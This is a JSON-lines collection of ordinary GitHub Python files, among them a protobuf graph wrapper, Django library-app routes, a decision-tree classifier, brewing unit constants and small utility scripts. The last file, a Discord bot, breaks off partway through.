+{"seq_id":"15211449756","text":"from lt_sdk.proto import lgf_pb2, node_filters, ops_pb2\n\n\nclass LightGraph(object):\n \"\"\"\n Wrapper around lgf_pb2.LGF() protobuf with some helper functions\n Immutable data type\n \"\"\"\n\n CONTROL_FLOW_OPS = {\n ops_pb2.ENTER,\n ops_pb2.SWITCH,\n ops_pb2.MERGE,\n ops_pb2.NEXT_ITERATION,\n ops_pb2.EXIT,\n }\n\n CONST_OPS = {\n ops_pb2.CONST,\n ops_pb2.VARIABLE,\n }\n\n CONST_NODES = {\n lgf_pb2.LNF.const.DESCRIPTOR.name,\n lgf_pb2.LNF.variable.DESCRIPTOR.name,\n }\n\n IS_CONST_ATTR = \"is_constant\"\n\n def __init__(self,\n nodes,\n input_edges=None,\n output_edges=None,\n output_node_names=None,\n meta_graph_info=None):\n \"\"\"\n Params:\n subgraphs: a list of lgf_pb2.LNF() protobufs\n input_edges: an optional list of lgf_pb2.EdgeInfo() protobufs\n output_edges: an optional list of lgf_pb2.EdgeInfo() protobufs\n output_nodes: a optional list of strings corresponding to output node names\n meta_graph_info: an optional lgf_pb2.MetaGraphInfo() protobuf\n \"\"\"\n input_edges = input_edges or []\n output_edges = output_edges or []\n output_node_names = output_node_names or []\n\n self._nodes = [self._copy_node(node) for node in nodes]\n self._input_edges = []\n input_names = set()\n for edge_info in input_edges:\n tup = (edge_info.name, edge_info.port)\n if tup not in input_names:\n input_names.add(tup)\n self._input_edges.append(self._copy_edge_info(edge_info))\n\n self._output_edges = [\n self._copy_edge_info(edge_info) for edge_info in output_edges\n ]\n self._output_node_names = list(output_node_names)\n\n if meta_graph_info is None:\n self._meta_graph_info = lgf_pb2.MetaGraphInfo()\n else:\n self._meta_graph_info = self._copy_meta_graph_info(meta_graph_info)\n\n # Dictionaries for fast lookups\n self._node_dict = {node.name: node for node in self._nodes}\n self._node_to_input_node_names = {node.name: set() for node in self._nodes}\n self._node_to_output_node_names = {node.name: set() for node in self._nodes}\n self._edge_dict = {}\n\n for node in self._nodes:\n # Input and output node names\n for e in node.inputs:\n if e.name in self._node_dict:\n self._node_to_input_node_names[node.name].add(e.name)\n self._node_to_output_node_names[e.name].add(node.name)\n for inp_name in node.control_inputs:\n if inp_name in self._node_dict:\n self._node_to_input_node_names[node.name].add(inp_name)\n self._node_to_output_node_names[inp_name].add(node.name)\n\n # Edges\n for e in list(node.inputs) + list(node.outputs):\n self._edge_dict[(e.name, e.port)] = e\n\n # Sort the input and output node names so they are always in the same order\n self._node_to_input_node_names = {\n k: sorted(v) for k,\n v in self._node_to_input_node_names.items()\n }\n self._node_to_output_node_names = {\n k: sorted(v) for k,\n v in self._node_to_output_node_names.items()\n }\n\n # Make sure required nodes are in the graph\n for node_name in self._meta_graph_info.required_nodes:\n if node_name not in self._node_dict:\n raise ValueError(\"Required node {} not found in graph\".format(node_name))\n\n def __eq__(self, other_graph):\n node_dict = self.node_dict()\n other_node_dict = other_graph.node_dict()\n\n if set(node_dict.keys()) != set(other_node_dict.keys()):\n return False\n\n return all(node_dict[name] == other_node_dict[name] for name in node_dict)\n\n def _copy_node(self, node):\n node_copy = lgf_pb2.LNF()\n node_copy.CopyFrom(node)\n return node_copy\n\n def _copy_edge_info(self, edge_info):\n edge_info_copy = lgf_pb2.EdgeInfo()\n edge_info_copy.CopyFrom(edge_info)\n return edge_info_copy\n\n def _copy_meta_graph_info(self, meta_graph_info):\n meta_graph_info_copy = lgf_pb2.MetaGraphInfo()\n meta_graph_info_copy.CopyFrom(meta_graph_info)\n return meta_graph_info_copy\n\n def nodes(self):\n \"\"\"\n Returns a list of nodes in the graph\n Always in the same order as the nodes used to initialize this object\n \"\"\"\n return [self._copy_node(node) for node in self._nodes]\n\n def node_dict(self):\n return {node.name: node for node in self.nodes()}\n\n def get_node_by_name(self, node_name):\n \"\"\"Returns the node in the graph with the given node_name.\"\"\"\n return self._copy_node(self._node_dict[node_name])\n\n def has_node(self, node_name):\n \"\"\"Returns True if there is a node with the given name\"\"\"\n return node_name in self._node_dict\n\n def get_edge(self, name, port):\n \"\"\"Returns an edge in the graph with the given name and port\"\"\"\n return self._copy_edge_info(self._edge_dict[(name, port)])\n\n def input_edges(self):\n \"\"\"\n Returns a list of lgf_pb2.InputInfo() protobufs specifying the inputs of\n the graph. Always in the same order as the inputs used to initialize this object\n \"\"\"\n return [self._copy_edge_info(edge_info) for edge_info in self._input_edges]\n\n def output_edges(self):\n \"\"\"\n Returns a list of lgf_pb2.OutputInfo() protobufs specifying the outputs of\n the graph. Always in the same order as the outputs used to initialize this object\n \"\"\"\n return [self._copy_edge_info(edge_info) for edge_info in self._output_edges]\n\n def output_node_names(self):\n \"\"\"\n Returns a list of strings corresponding to output nodes of the graph\n \"\"\"\n return list(self._output_node_names)\n\n def get_input_node_names_of_node(self, node):\n \"\"\"\n Returns a list of the input node names of the given node\n \"\"\"\n return list(self._node_to_input_node_names[node.name])\n\n def get_output_node_names_of_node(self, node):\n \"\"\"\n Returns a list of the output node names of the given node\n \"\"\"\n return list(self._node_to_output_node_names[node.name])\n\n def meta_graph_info(self):\n \"\"\"\n Returns a lgf_pb2.MetaGraphInfo() protobuf\n \"\"\"\n return self._copy_meta_graph_info(self._meta_graph_info)\n\n def prune_graph(self,\n input_edges=None,\n output_edges=None,\n output_node_names=None,\n include_inputs=True):\n \"\"\"Returns a new light_graph object.\"\"\"\n # Inputs and outputs of pruned graph are the same\n input_edges = input_edges or self.input_edges()\n output_edges = output_edges or self.output_edges()\n output_node_names = output_node_names or self.output_node_names()\n\n # Node filter for input nodes\n input_node_filter = node_filters.and_filter(*[\n node_filters.not_filter(node_filters.name_is_filter(e.name))\n for e in input_edges\n ])\n\n # Get the root nodes for pruning, include required nodes\n root_nodes = [self.get_node_by_name(e.name) for e in output_edges] + [\n self.get_node_by_name(node_name) for node_name in output_node_names\n ] + [\n self.get_node_by_name(node_name)\n for node_name in self._meta_graph_info.required_nodes\n ]\n\n # Only keep nodes that the outputs depend on\n nodes = []\n node_names = set()\n for i, root_node in enumerate(root_nodes):\n # Do not use the input node filter for required nodes\n if i < (len(output_edges) + len(output_node_names)):\n node_filter = input_node_filter\n else:\n node_filter = None\n\n for node in self.bfs(root_node, node_filter=node_filter):\n if node.name not in node_names:\n nodes.append(node)\n node_names.add(node.name)\n\n # Make sure inputs and outputs come from the original graph\n input_edges = [self.get_edge(e.name, e.port) for e in input_edges]\n output_edges = [self.get_edge(e.name, e.port) for e in output_edges]\n\n # Add input nodes if necessary\n if include_inputs:\n for e in input_edges:\n if e.name in self._node_dict and e.name not in node_names:\n nodes.append(self._node_dict[e.name])\n node_names.add(e.name)\n\n return LightGraph(nodes,\n input_edges=input_edges,\n output_edges=output_edges,\n output_node_names=output_node_names,\n meta_graph_info=self.meta_graph_info())\n\n def bfs(self,\n root_node,\n bidirectional=False,\n node_filter=None,\n skip_control_inputs=False):\n \"\"\"\n Does a BFS on the graph starting at the root_node\n\n Params:\n root_node: starting node for the BFS\n bidirectional: If False, look at a nodes inputs when doing the BFS and\n discovering new nodes. If True do a bidirectional search, looking at\n a nodes inputs and outputs when discovering new nodes.\n node_filter: If provided, only add nodes to the frontier that match the\n filter with this graph. Note that if the root_node does not match the\n provided filter, no nodes will be returned.\n \"\"\"\n # Check for unsupported cases\n if bidirectional and skip_control_inputs:\n raise ValueError(\"Bidirectional BFS is currently unsupported when\" +\n \"skipping control inputs\")\n\n # Update node filter with defaults\n default_filter = node_filters.not_filter(\n node_filters.name_starts_with_filter(\"^\"))\n if node_filter is None:\n node_filter = default_filter\n else:\n node_filter = node_filters.and_filter(default_filter, node_filter)\n\n # Special case when the root_node does not match node_filter\n if not (node_filter.matches(root_node, self)):\n return []\n\n # BFS\n visited_node_names = {root_node.name}\n current_nodes = [root_node]\n frontier = []\n while current_nodes:\n for parent_node in current_nodes:\n yield self._copy_node(parent_node)\n\n # Default uses inputs for child nodes\n if skip_control_inputs:\n # Skip control inputs\n child_nodes = [\n self._node_dict[e.name]\n for e in parent_node.inputs\n if self.has_node(e.name)\n ]\n else:\n # Include control inputs\n child_nodes = [\n self._node_dict[n]\n for n in self._node_to_input_node_names[parent_node.name]\n ]\n\n # Bidirectional adds outputs as well, currently always includes\n # control inputs\n if bidirectional:\n child_nodes += [\n self._node_dict[n]\n for n in self._node_to_output_node_names[parent_node.name]\n ]\n\n for child_node in child_nodes:\n if (child_node.name not in visited_node_names\n and node_filter.matches(child_node,\n self)):\n visited_node_names.add(child_node.name)\n frontier.append(child_node)\n\n current_nodes = frontier\n frontier = []\n\n @staticmethod\n def _is_const(node):\n if node.HasField(lgf_pb2.LNF.original.DESCRIPTOR.name):\n return node.original.op in LightGraph.CONST_OPS\n else:\n return node.WhichOneof(\"node\") in LightGraph.CONST_NODES\n\n def is_constant_node(self, node):\n \"\"\"\n Check whether a node is constant.\n\n A node is constant provided all of its non-control incoming inputs come from\n constant nodes.\n If a node has no inputs and self._is_const(node) is False, it is defined to be\n a non-constant node.\n If a node is a control flow op, it is defined to be a non-constant node unless\n it is an Enter node with the attribute is_constant == True.\n \"\"\"\n # Traverse the subtree rooted at node, skipping control inputs\n for child_node in self.bfs(node, skip_control_inputs=True):\n # Control flow ops not constant\n if (child_node.HasField(lgf_pb2.LNF.original.DESCRIPTOR.name)\n and child_node.original.op in self.CONTROL_FLOW_OPS):\n # Exception for constant enter node\n if child_node.original.op == ops_pb2.ENTER and child_node.original.attr[\n self.IS_CONST_ATTR].b:\n continue\n\n return False\n\n # Found a leaf of the subtree if\n # 1) The node has no non-control inputs\n # 2) The node has a non-control input edge that does not come from\n # a node inside the graph (an input edge to the graph)\n if (not len(child_node.inputs)\n or any([not self.has_node(e.name) for e in child_node.inputs])):\n # Found a non-constant leaf in the subtree\n if not self._is_const(child_node):\n return False\n\n return True\n\n def as_lgf_pb(self):\n \"\"\"\n Returns the Lightelligence Graph Format (LGF) Protobuf corresponding to\n this graph\n \"\"\"\n lgf_pb = lgf_pb2.LGF()\n lgf_pb.nodes.extend(self.nodes())\n lgf_pb.input_edges.extend(self.input_edges())\n lgf_pb.output_edges.extend(self.output_edges())\n lgf_pb.output_node_names.extend(self.output_node_names())\n lgf_pb.meta_graph_info.CopyFrom(self.meta_graph_info())\n\n return lgf_pb\n\n @classmethod\n def lgf_pb_to_graph(cls, lgf_pb):\n \"\"\"Converts a LGF Proto to a LightGraph object\"\"\"\n return cls(list(lgf_pb.nodes),\n list(lgf_pb.input_edges),\n list(lgf_pb.output_edges),\n list(lgf_pb.output_node_names),\n meta_graph_info=lgf_pb.meta_graph_info)\n\n @staticmethod\n def read_lgf_pb(lgf_pb_path):\n \"\"\"Reads a LGF Proto from the binary file at lgf_pb_path\"\"\"\n light_graph = lgf_pb2.LGF()\n with open(lgf_pb_path, \"rb\") as f:\n light_graph.ParseFromString(f.read())\n\n return light_graph\n\n @staticmethod\n def write_lgf_pb(lgf_pb, lgf_pb_path):\n \"\"\"Writes lgf_pb as a binary file to lgf_pb_path\"\"\"\n with open(lgf_pb_path, \"wb\") as f:\n f.write(lgf_pb.SerializeToString())\n\n @staticmethod\n def from_pb(lgf_pb_path):\n return LightGraph.lgf_pb_to_graph(LightGraph.read_lgf_pb(lgf_pb_path))\n\n\nclass MutableLightGraph(LightGraph):\n\n def get_node_by_name(self, node_name):\n \"\"\"Returns the node in the graph with the given node_name.\"\"\"\n return self._node_dict[node_name]\n","repo_name":"HermanYang/SDKDocs","sub_path":"lt_sdk/graph/lgf_graph.py","file_name":"lgf_graph.py","file_ext":"py","file_size_in_byte":15592,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"45241471790","text":"from django.contrib import admin\r\nfrom django.urls import path,include\r\nfrom . import views\r\nfrom django.contrib.auth import views as auth_views\r\nfrom django.views.generic.base import RedirectView\r\n\r\nfrom django.conf import settings\r\nfrom django.conf.urls.static import static\r\n\r\nurlpatterns = [\r\n path('admin_home',views.home, name=\"home-page\"),\r\n path('login',views.login_view,name='login-page'),\r\n path('register',views.userregister,name='register-page'),\r\n path('save_register',views.save_register,name='register-user'),\r\n path('user_login',views.login_user,name='login-user'),\r\n path('home',views.home,name='home-page'),\r\n path('logout',views.logout_user,name='logout'),\r\n path('profile',views.profile,name='profile-page'),\r\n path('update_password',views.update_password,name='update-password'),\r\n path('update_profile',views.update_profile,name='update-profile'),\r\n path('users',views.users,name='user-page'),\r\n path('manage_user',views.manage_user,name='manage-user'),\r\n path('manage_user/',views.manage_user,name='manage-user-pk'),\r\n path('save_user',views.save_user,name='save-user'),\r\n path('delete_user/',views.delete_user,name='delete-user'),\r\n path('category',views.category,name='category-page'),\r\n path('manage_category',views.manage_category,name='manage-category'),\r\n path('manage_category/',views.manage_category,name='manage-category-pk'),\r\n path('view_category/',views.view_category,name='view-category-pk'),\r\n path('save_category',views.save_category,name='save-category'),\r\n path('delete_category/',views.delete_category,name='delete-category'),\r\n path('sub_category',views.sub_category,name='sub_category-page'),\r\n path('manage_sub_category',views.manage_sub_category,name='manage-sub_category'),\r\n path('manage_sub_category/',views.manage_sub_category,name='manage-sub_category-pk'),\r\n path('view_sub_category/',views.view_sub_category,name='view-sub_category-pk'),\r\n path('save_sub_category',views.save_sub_category,name='save-sub_category'),\r\n path('delete_sub_category/',views.delete_sub_category,name='delete-sub_category'),\r\n path('books',views.books,name='book-page'),\r\n path('manage_book',views.manage_book,name='manage-book'),\r\n path('manage_book/',views.manage_book,name='manage-book-pk'),\r\n path('view_book/',views.view_book,name='view-book-pk'),\r\n path('save_book',views.save_book,name='save-book'),\r\n path('delete_book/',views.delete_book,name='delete-book'),\r\n path('members',views.members,name='member-page'),\r\n path('manage_member',views.manage_member,name='manage-member'),\r\n path('manage_member/',views.manage_member,name='manage-member-pk'),\r\n path('view_member/',views.view_member,name='view-member-pk'),\r\n path('save_member',views.save_member,name='save-member'),\r\n path('delete_member/',views.delete_member,name='delete-member'),\r\n path('borrows',views.borrows,name='borrow-page'),\r\n path('manage_borrow',views.manage_borrow,name='manage-borrow'),\r\n path('manage_borrow/',views.manage_borrow,name='manage-borrow-pk'),\r\n path('view_borrow/',views.view_borrow,name='view-borrow-pk'),\r\n path('save_borrow',views.save_borrow,name='save-borrow'),\r\n path('delete_borrow/',views.delete_borrow,name='delete-borrow'),\r\n path(\"view_issued_book/\", views.view_issued_book, name=\"view_issued_book\"),\r\n\r\n ####chats\r\n path('ucchat/', views.UCreateChat.as_view(), name='ucchat'),\r\n path('ulchat/', views.UListChat.as_view(), name='ulchat'),\r\n \r\n path('acchat/', views.ACreateChat.as_view(), name='acchat'),\r\n path('alchat/', views.AListChat.as_view(), name='alchat'),\r\n\r\n\r\n path('Memberregister/',views.Memberregister, name='member_register'),\r\n\r\n\r\n\r\n\r\n #members\r\n path('',views.members_home,name=\"members-home\"),\r\n path('signup/', views.members_register, name='signup'),\r\n path('members_home',views.members_homepage,name=\"members-homepage\"),\r\n path('member_borrow',views.memberborrow,name='member-borrow-page'),\r\n path('member_details',views.MemberDetails_save,name=\"MemberDetails-save\"),\r\n path('view/',views.ViewMember,name='viewmember'),\r\n path('members_book_page',views.members_bookpage,name=\"members-book-page\"),\r\n path('transactions',views.Transaction,name=\"transaction\"),\r\n path('manage_transaction',views.manage_transaction,name='manage-transaction'),\r\n path('manage_transaction/',views.manage_transaction,name='manage-transaction-pk'),\r\n # path('view_transaction/',views.Transaction,name='view-transaction-pk'),\r\n path('save_transaction',views.save_transaction,name='save-transaction'),\r\n path('delete_transaction/',views.delete_transaction,name='delete-transaction'),\r\n path('fines',views.memberfine,name='fines'),\r\n path('collections',views.collections,name=\"collection\"),\r\n path('bookinfo',views.BookInfo,name=\"bookinfo\"),\r\n path(\"issued_books/\", views.issued_books, name=\"issued_books\"),\r\n\r\n\r\n\r\n\r\n]+ static(settings.MEDIA_URL, document_root = settings.MEDIA_ROOT)\r\n","repo_name":"ericdev-202/library","sub_path":"django_lms/lmsApp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":5181,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"71374557768","text":"# extract *all* labels from project gutenberg\n\nfrom gutenberg.query import get_metadata\n\n# when running this code for the first time, you have to create a cache of the meta data. This may take some time\n# (according to the author of the package - compare https://pypi.org/project/Gutenberg/ -, it took 18hrs on his machine,\n# on mine it was less than 4 - I didn't check earlier, because I expected it would be around 18 as well.\n#\n# from gutenberg.acquire import get_metadata_cache\n#\n# cache = get_metadata_cache()\n# cache.populate()\n\n# list supported types of metadata\n# from gutenberg.query import list_supported_metadatas\n# print(list_supported_metadatas())\n\nresults = {}\n\nfor i in range(1, 57700):\n try:\n if get_metadata('language', i) == frozenset({'en'}):\n print(i)\n labels = get_metadata('subject', i)\n results[i] = labels\n except:\n print(\"extracting labels: Error at index \" + str(i) + \" probably no file with id \" + str(i) + \" was found. Skipped.\")\n with open(\"./log/label_extraction.txt\", 'a+') as logfile:\n logfile.write(\"extracting labels: Error at index \" + str(i) + \" probably no file with id \" + str(i) + \" was found. Skipped.\\n\")\n\npath = \"../data/labels.txt\"\nwith open(path, \"w\") as file:\n file.write(str(results))\n","repo_name":"Berndinio/AML_project","sub_path":"scripts/extract_labels.py","file_name":"extract_labels.py","file_ext":"py","file_size_in_byte":1305,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"3780340485","text":"\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\n\nclass DecisionTree(object):\n \"\"\"Decision Tree.\n\n Implements the base class from which `ClassificationTree` and\n `RegressionTree` are built upon. All the functionality is defined in the\n base class `DecisionTree` except for evaluating a split and checking if a\n Leaf has been reached.\n\n Parameters\n ----------\n max_depth : int or None\n The maximum depth of the tree.\n \"\"\"\n def __init__(self, max_depth=None):\n self.max_depth = max_depth\n\n def fit(self, X, y):\n \"\"\"Fit a decision tree model to the data.\n\n Parameters\n ----------\n X : ndarray\n A matrix with the training data.\n y : ndarray\n A column vector with the true target values.\n\n Returns\n self\n \"\"\"\n self.root = self.partition(X, y)\n return self\n\n def predict(self, X, y=None):\n \"\"\"Predict the target for a data row `X`.\n\n Parameters\n ----------\n X : ndarray\n A data row of shape (n_features,).\n\n Returns\n -------\n pred : float or int\n Prediction for the data row `X`.\n \"\"\"\n pred = np.zeros(shape=(X.shape[0], 1))\n for i in range(X.shape[0]):\n pred[i] = self.traverse(X[i, :], self.root)\n return pred\n\n def traverse(self, X, node):\n \"\"\"Traverse the tree.\n\n Parameter\n ---------\n X : ndarray\n A single row of data.\n node: TreeNode instance\n The node should be the root of the tree.\n\n Returns\n -------\n pred : float\n The prediction for row `X`.\n \"\"\"\n if isinstance(node, Leaf):\n return node.pred\n if X[node.feature] <= node.split_val:\n return self.traverse(X, node.left_child)\n else:\n return self.traverse(X, node.right_child)\n\n def partition(self, X, y, depth=0):\n \"\"\"Partition the data.\n\n Parameters\n ----------\n X : ndarray\n A matrix with the data.\n y : ndarray\n A column vector with the true target values.\n depth : int\n The maximum depth of the tree to grow.\n\n Returns\n -------\n node : TreeNode instance\n A node which represents the root of the fitted tree.\n \"\"\"\n check = self.check_partition(y, depth)\n if isinstance(check, Leaf):\n return check\n\n feature, split_val = self.find_feature(X, y)\n X_left = X[X[:, feature] <= split_val]\n X_right = X[X[:, feature] > split_val]\n y_left = y[X[:, feature] <= split_val]\n y_right = y[X[:, feature] > split_val]\n\n node = TreeNode(feature, split_val, self.partition(X_left, y_left, depth+1),\n self.partition(X_right, y_right, depth+1))\n return node\n\n def find_feature(self, X, y):\n \"\"\"Find a feature to split.\n\n Parameters\n ----------\n X : ndarray\n y : ndarray\n\n Returns\n -------\n best_feature : int\n The index of the best feature to split.\n best_split : float\n The best value to split at.\n \"\"\"\n cost_low = np.inf\n best_feature = None\n best_split = None\n for i in range(X.shape[1]):\n cost, split_val = self.find_split(X[:, i], y)\n if cost < cost_low:\n best_feature = i\n best_split = split_val\n cost_low = cost\n return best_feature, best_split\n\n def find_split(self, feature, y):\n \"\"\"Find best split.\n\n Find the best split given the values for the provided feature.\n\n Parameters\n ----------\n feature : ndarray\n An column vector with the values for one feature. Should be of\n shape (m,).\n y : ndarray\n A column vector with the true labels for the column vector\n `feature`. Should be of shape (m,).\n\n Returns\n -------\n cost_low : float\n The lowest cost that can be achieved by splitting the feature at\n the value `best_split`.\n best_split : float\n The value in `feature` which is the best split, i.e. the split that\n minimize the cost.\n \"\"\"\n idx_sorted = np.argsort(feature)\n feature = feature[idx_sorted]\n y = y[idx_sorted]\n cost_low = np.inf\n best_split = None\n for v in np.unique(feature)[:-1]:\n r1 = y[feature <= v]\n r2 = y[feature > v]\n cost = self.eval_split(r1, r2)\n if cost < cost_low:\n cost_low = cost\n next_val = feature[feature > v][0]\n best_split = (v + next_val) / 2\n return cost_low, best_split\n\n def eval_split(self, r1, r2):\n raise NotImplementedError\n\n def check_partition(self, y, depth):\n raise NotImplementedError\n\n\nclass ClassificationTree(DecisionTree):\n \"\"\"Classification tree.\n\n Implements decision tree which can be used for classification. It is built\n on the class `DecisionTree` with the only addition is to compute the cost\n function when deciding splits.\n\n Parameters\n ----------\n impurity_measure : {'gini', 'entropy'}\n Defines which impurity measure which should be used when fitting the\n tree.\n max_depth : int or None\n The maximum depth of the tree.\n \"\"\"\n def __init__(self, impurity_measure='gini', max_depth=None):\n self.impurity_measure = impurity_measure\n super().__init__(max_depth=max_depth)\n\n def check_partition(self, y, depth):\n \"\"\"Check if `y` only contains one class or if the maximum depth is\n reached.\n\n Parameters\n ----------\n y : ndarray\n An array with class labels.\n depth : int\n The maximum depth of the tree.\n\n Returns\n -------\n check : Leaf instance or None\n A Leaf instance is returned if either `y` only contains one class\n label or if the maximum depth of the tree is reached. Otherwise,\n None is returned.\n \"\"\"\n (y_unique, counts) = np.unique(y, return_counts=True)\n\n if len(y_unique) == 1:\n return Leaf(y_unique)\n\n if self.max_depth is None:\n return None\n elif depth >= self.max_depth:\n idx = np.argmax(counts)\n val = y_unique[idx]\n return Leaf(val)\n else:\n return None\n\n def eval_split(self, y_left, y_right):\n \"\"\"Evaluate a candidate split.\n\n y_left : ndarray\n The true target value for one of the two partitions. Should be of\n shape (n_left,).\n y_right : ndarray\n The true target value for one of the two partitions. Should be of\n shape (n_right,).\n\n Returns\n -------\n float\n The value of the impurity measure for the given split.\n \"\"\"\n p_left = np.mean(y_left, keepdims=True)\n p_right = np.mean(y_right, keepdims=True)\n if self.impurity_measure == 'gini':\n c_left = gini(p_left)\n c_right = gini(p_right)\n else:\n c_left = enropy(p_left)\n c_right = enropy(p_right)\n n_left = y_left.shape[0]\n n_right = y_right.shape[0]\n n = n_left + n_right\n return (n_left / n) * c_left + (n_right / n) * c_right\n\n def plot_boundaries(self, X, y):\n plt.figure()\n sns.scatterplot(x=X[:, 0], y=X[:, 1], hue=y, style=y, legend=None)\n\n def plot_node(node):\n if isinstance(node, TreeNode):\n if node.feature == 0:\n plt.axvline(x=node.split_val, color='r')\n else:\n plt.axhline(y=node.split_val, color='r')\n plot_node(node.right_child)\n plot_node(node.left_child)\n\n plot_node(self.root)\n plt.show()\n\n\ndef gini(p):\n return 2 * p * (1 - p)\n\n\ndef enropy(p):\n return - (p * np.log(p) + (1 - p) * np.log(1 - p))\n\n\nclass TreeNode(object):\n \"\"\"\n This implements a node in a tree which is not a leaf. It is used to store\n information about which feature to split and at which value.\n\n Attributes\n ----------\n feature : int\n split_val : float\n left_child : TreeNode instance or Leaf instance\n right_child : TreeNode instance or Leaf instance\n \"\"\"\n def __init__(self, feature, split_val, left_child, right_child):\n self.feature = feature\n self.split_val = split_val\n self.left_child = left_child\n self.right_child = right_child\n\n\nclass Leaf(object):\n \"\"\"Leaf node.\n\n This implements a leaf node in a tree which is used to store predictions.\n\n Attributes\n ----------\n pred : int\n The predicted label for an observation which ends up in this leaf.\n \"\"\"\n def __init__(self, pred):\n self.pred = int(pred)\n","repo_name":"franslarsson/ml-algo","sub_path":"tree_models/decision_tree.py","file_name":"decision_tree.py","file_ext":"py","file_size_in_byte":9090,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"392729248","text":"from pyspark.sql.dataframe import DataFrame\nfrom dataquality_bnr.dqSupport import main as dqSup\n\ndef getDataframe(spark, inputData):\n print(\"getDataframe...\")\n \n df=None\n \n if type(inputData) == DataFrame:\n df=inputData\n elif type(inputData) == str:\n inputDataYaml = inputData\n df = dqSup.getDataframe(spark, yaml_path=inputDataYaml)\n \n return df","repo_name":"brunoRenzo6/Spark-DataQuality","sub_path":"dataquality-bnr/dataquality_bnr/yamlHandler/inputData.py","file_name":"inputData.py","file_ext":"py","file_size_in_byte":391,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"6866090504","text":"gramsperounce\t= 28.349523\ngramsperpound\t= 16 * gramsperounce\nlitersperquart\t= 0.94635295\nliterspergallon\t= 4 * litersperquart\ngallonsperbarrel= 31\n\t\t # tbsp * cup * quart * gallon\ntsppergallon\t= 3 * 16 * 4 * 4\n\t\t # quart * gallon\ncupspergallon\t= 4 * 4\n\npascalsperbar\t= 100000\npascalsperatm\t= 101325\npascalsperpsi\t= 6894.75729\n\nabsolute_zero_c\t= -273.15\n\nebcpersrm\t= 1.97\n\n# g/l of co2 at stp\nco2_stp_gl\t= 1.977\n\n# in case the maltster doesn't report a fine-coarse difference, use 1.5%\nfine_coarse_diff= 1.5\n\n# need this much conversion power in the entire recipe (WK)\nminconversion\t= 94\n\n# hop absorption, milliliter of wort per gram of hops\npellethop_absorption_mlg = 6\nleafhop_absorption_mlg = 10\n\n# specific volume of grains in l/kg.\n#\n# don't remember where I pulled this figure from, so should\n# check accuracy of it some day.\ngrain_specificvolume = 0.7\n\n# hop densities, via http://www.ebc2017.com/inhalt/uploads/P023_Schuell.pdf\n# used for calculating hops volumes to that we know how much wort fits\n# into the keg. frankly, the volume are so small that it doesn't matter\n# that much, but let's do it just to accommodate for the pathological\n# \"500g leaf hops in a 5gal keg\" case.\n#\n# Also, I'm not sure those values are for the density of the *hops*, not\n# the packaging. need to measure for myself. Just use these numbers\n# for now.\n#\n# in kg/m3 (or g/l)\npellethop_density_gl = 500\nleafhop_density_gl = 135\n\ndatefmt=\"%a %d %b %Y\"\n","repo_name":"anttikantee/wbc","sub_path":"WBC/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":1444,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"16"}
+{"seq_id":"19392500528","text":"# Problem to Solve: What if we need the length of the words separated by a space to be added at the end of that same word and have it returned as an array?\n\n# Examples:\n# \"apple ban\" --> [\"apple 5\", \"ban 3\"]\n# \"you will win\" -->[\"you 3\", \"will 4\", \"win 3\"] \n\n# 1. Determine length of each string\n# 2. Add lenth immediately after each string\n\n# Split single string into list of individuals\n# Loop through list counting each individual string's length.\n# concatenate string with its length Inter \n\n\nstr_1 = \"you will win\"\nstr_2 = \"\"\n\ndef add_length(str_):\n \n lslist = []\n split_string = str_.split()\n for x in split_string:\n l = len(x)\n lslist.append(x + ' ' + str(l))\n \n return lslist\n\n\n\n\n\nprint(add_length(str_1))","repo_name":"JACedwards/Code_Wars_Solutions","sub_path":"Add_Length.py","file_name":"Add_Length.py","file_ext":"py","file_size_in_byte":752,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"22080687556","text":"import multiprocessing as mp\nimport time\n\ndef f(name):\n count = 0\n while True: \n print('hello ', name, \"count: \", count)\n count += 1\n time.sleep(1)\n\nif __name__ == '__main__':\n p = mp.Process(target=f, args=('bob',))\n p.start()\n print(\"main process going to sleep\")\n time.sleep(5)\n p2 = mp.Process(target=f, args=('paulo',))\n p2.start()\n print(\"main process going to sleep again\")\n time.sleep(5) \n c = 0\n while True:\n print(\"main\")\n time.sleep(1)\n c += 1\n if c == 10:\n print(\"matar processing\")\n p.terminate()\n","repo_name":"ppereiradev/fault-injector","sub_path":"testing.py","file_name":"testing.py","file_ext":"py","file_size_in_byte":620,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
+{"seq_id":"34487763794","text":"import sys\nimport functions.link_handler as lh\n\ndef main():\n if not sys.argv[1]:\n print(\"Did not get an URL, please give one\")\n exit\n \n url = sys.argv[1]\n \n print(f\"Starting to gather URLS from {url}\")\n\n links = lh.gather_links_from_url(url)\n\nif __name__ == \"__main__\":\n main()","repo_name":"MichaelNirkman/web-mash","sub_path":"webmash.py","file_name":"webmash.py","file_ext":"py","file_size_in_byte":312,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"70651874887","text":"import asyncio\nimport nextcord as discord\nimport os\nimport pickle\nimport requests\nimport sys\nfrom nextcord.ext import commands\nfrom random import randint\nfrom time import sleep\nfrom typing import Optional, Union, Dict, Set, Tuple\ntry:\n from open_digraph import *\nexcept ImportError:\n from .open_digraph import *\n\nsys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))\n\n# CONSTANTES ###################################################################\nfrom constantes import ADMINS, TOKEN, prefixeBot\nfrom utils import stockePID, cheminOutputs\nChannelID = Tuple[int, int] #tuple qui contient l'id du salon et l'id du serveur\nMessage = int #l'id du message\nclass Groupe(OpenDigraph):\n def __init__(self):\n super().__init__([], [], [])\n self.originaux: Dict[Message, Message] = dict() #associe à une copie le message original\n self.copies: Dict[Message, Set[Message]] = dict() #associe à un original la liste de ses copies\n self.copiesGuild: Dict[Tuple[Message, ChannelID], Message] 